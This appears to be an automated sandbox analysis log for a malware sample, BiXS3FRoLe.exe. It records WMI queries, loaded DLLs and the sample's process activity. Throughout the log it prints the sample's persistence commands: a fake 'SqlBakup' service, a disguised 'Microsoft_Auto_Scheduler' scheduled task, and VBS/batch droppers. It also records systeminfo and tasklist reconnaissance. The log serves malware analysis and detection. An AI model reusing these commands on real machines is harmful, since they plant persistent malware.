Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="7516"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="7552"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="7616"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="7724"::GetOwner
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6668"::GetOwner
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'BIXS3FROLE.EXE'
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'BIXS3FROLE.EXE'
Source: C:\Windows\SysWOW64\find.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\find.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4"::GetOwner
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'BIXS3FROLE.EXE'
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'BIXS3FROLE.EXE'
Source: C:\Windows\SysWOW64\cmd.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: tasklist.exe, 00000004.00000003.1278119642.00000000033C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Processs;o
Source: tasklist.exe, 00000004.00000003.1279876506.00000000033C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Processs;
Source: BiXS3FRoLe.exe ReversingLabs: Detection: 84%
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe File read: C:\Users\user\Desktop\BiXS3FRoLe.exe
Source: unknown Process created: C:\Users\user\Desktop\BiXS3FRoLe.exe "C:\Users\user\Desktop\BiXS3FRoLe.exe"
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /v /fo csv
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "dcdcf"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown Process created: C:\Windows\System32\Sgrmuserer.exe C:\Windows\system32\Sgrmuserer.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ver
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /f
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo %date%-%time%
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\find.exe find /i "os name"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /v
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\find.exe find /I /c "dcdcf"
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\S-2153.bat""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\find.exe find /i "original"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ver
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
Source: C:\Windows\SysWOW64\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /v
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I /c "dcdcf"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\find.exe find /I "BiXS3FRoLe.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\find.exe find /I "BiXS3FRoLe.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\find.exe find /I "BiXS3FRoLe.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\find.exe find /I "BiXS3FRoLe.exe"
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ver
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo %date%-%time%
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"
Source: C:\Users\user\Desktop\BiXS3FRoLe.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ver
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /v /fo csv
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "dcdcf"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /fJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfoJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /i "os name"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /vJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I /c "dcdcf" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "BiXS3FRoLe.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "BiXS3FRoLe.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "BiXS3FRoLe.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /i "original"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I /c "dcdcf"
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: apphelp.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: netapi32.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: wininet.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: samcli.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: dsrole.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: netutils.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: cryptsp.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: rsaenh.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: cryptbase.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: sspicli.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: ntmarta.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: samlib.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: mpr.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: iertutil.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: windows.storage.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: wldp.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: profapi.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: kernel.appcore.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: ondemandconnroutehelper.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: winhttp.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: mswsock.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: iphlpapi.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: winnsi.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: urlmon.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: srvcli.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: dnsapi.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: rasadhlp.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: fwpuclnt.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: napinsp.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: pnrpnsp.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: wshbth.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: nlaapi.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Section loaded: winrnr.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: moshost.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: mapsbtsvc.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: mosstorage.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ztrace_maps.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ztrace_maps.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: bcp47langs.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: mapconfiguration.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: windows.storage.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: aphostservice.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: networkhelper.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: userdataplatformhelperutil.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: syncutil.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: mccspal.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: vaultcli.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: dmcfgutils.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: wintypes.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: dmcmnutils.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: dmxmlhelputils.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: inproclogger.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: windows.networking.connectivity.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: synccontroller.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: pimstore.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: aphostclient.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: accountaccessor.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: dsclient.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: systemeventsusererclient.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: userdatalanguageutil.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: mccsengineshared.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: cemapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: userdatatypehelperutil.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: phoneutil.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: storsvc.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: devobj.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: fltlib.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: bcd.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: wer.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: cabinet.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
